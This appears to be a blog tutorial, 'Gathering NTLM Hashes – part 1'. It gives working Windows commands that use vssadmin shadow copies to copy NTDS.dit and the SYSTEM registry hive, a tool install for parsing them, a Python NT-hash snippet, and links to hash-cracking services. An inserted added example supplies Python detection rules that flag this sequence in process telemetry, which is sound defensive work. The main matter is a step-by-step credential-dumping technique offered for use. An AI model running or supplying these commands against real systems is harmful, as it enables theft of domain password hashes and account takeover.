Gathering NTLM Hashes – part 1


One of the most reliable ways to gather system hashes is to use vssadmin to create a shadow copy of the system drive and then copy the files out of it. These files are normally locked and protected by the running system, so recovering them from the shadow copy is among the easiest methods. The caveat here is that you must be an administrator.

Step 1: Gather the data

run cmd as administrator
vssadmin list shadows
vssadmin create shadow /For=c:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\System32\config\SYSTEM C:\
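As an added example (not part of the original post), this Python detection logic flags the Step 1 sequence when run over process-creation telemetry. The records are constructed and simplified; mapping them onto real Event ID 4688 data assumes command-line auditing is enabled.

```python
import re

# Constructed, simplified process-creation records; the field names stand in for
# Event ID 4688's "New Process Name" and "Process Command Line" (assumed enabled).
SAMPLE_EVENTS = [
    {"host": "DC01", "user": r"CORP\admin", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"host": "DC01", "user": r"CORP\admin", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin create shadow /For=c:"},
    {"host": "DC01", "user": r"CORP\admin", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp"},
    {"host": "WS07", "user": r"CORP\backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list writers"},
]

# Rule 1: a shadow copy being created from the command line (Step 1 of the post).
SHADOW_CREATE = re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)
# Rule 2: a credential store read through the shadow copy device path.
SHADOW_PATH = re.compile(r"HarddiskVolumeShadowCopy\d*", re.I)
CRED_STORE = re.compile(r"\\(ntds\.dit|config\\(system|sam|security))\b", re.I)


def classify(event):
    """Return (rule_name, severity) for one record, or None if it is benign."""
    cmd = event["cmdline"]
    if SHADOW_CREATE.search(cmd):
        return ("vss_shadow_created", "medium")
    if SHADOW_PATH.search(cmd) and CRED_STORE.search(cmd):
        return ("credential_store_read_via_shadow", "high")
    return None


def detect(events):
    """Tag each record; escalate a credential-store read to critical when a
    shadow copy was created earlier on the same host (the post's sequence)."""
    alerts, hosts_with_shadow = [], set()
    for ev in events:
        tag = classify(ev)
        if tag is None:
            continue
        rule, severity = tag
        if rule == "vss_shadow_created":
            hosts_with_shadow.add(ev["host"])
        elif ev["host"] in hosts_with_shadow:
            severity = "critical"
        alerts.append({"host": ev["host"], "user": ev["user"], "rule": rule,
                       "severity": severity, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["severity"]:8} {a["host"]} {a["user"]} {a["rule"]}: {a["cmdline"]}')
```

Running it against the constructed records yields one medium alert for the shadow creation and one critical alert for the NTDS.dit copy on the same host; the two `list` invocations stay silent.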

Step 2: Installing the tools

We are going to need some tools.

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
./autogen.sh

I usually want to perform a sanity check to make sure I am getting the right hash. The quickest way is a small snippet of Python.

import hashlib, binascii

# The NT hash is MD4 over the UTF-16LE encoding of the password.
# hashlib.new('md4') depends on the underlying OpenSSL build: with OpenSSL 3
# the legacy provider must be enabled or this raises ValueError.
password = "thisismyhashvalue"
nt_hash = hashlib.new('md4', password.encode('utf-16le')).digest()
print(binascii.hexlify(nt_hash).decode())

  • https://hashc.co.uk/
  • https://github.com/libyal/libesedb/wiki/Building
  • http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
  • http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_3_beta.zip
  • https://hashkiller.co.uk/ntlm-decrypter.aspx
  • https://gpuhash.me/
  • https://TMTO.org
